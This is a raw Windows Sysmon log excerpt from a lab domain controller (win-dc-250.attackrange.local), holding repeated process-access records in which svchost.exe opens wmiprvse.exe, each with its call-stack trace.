13:09:33.650{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.650{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.635{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.635{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.635{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.619{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.603{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.603{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.603{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.588{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.588{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.588{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.588{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.588{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.588{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.525{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.525{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 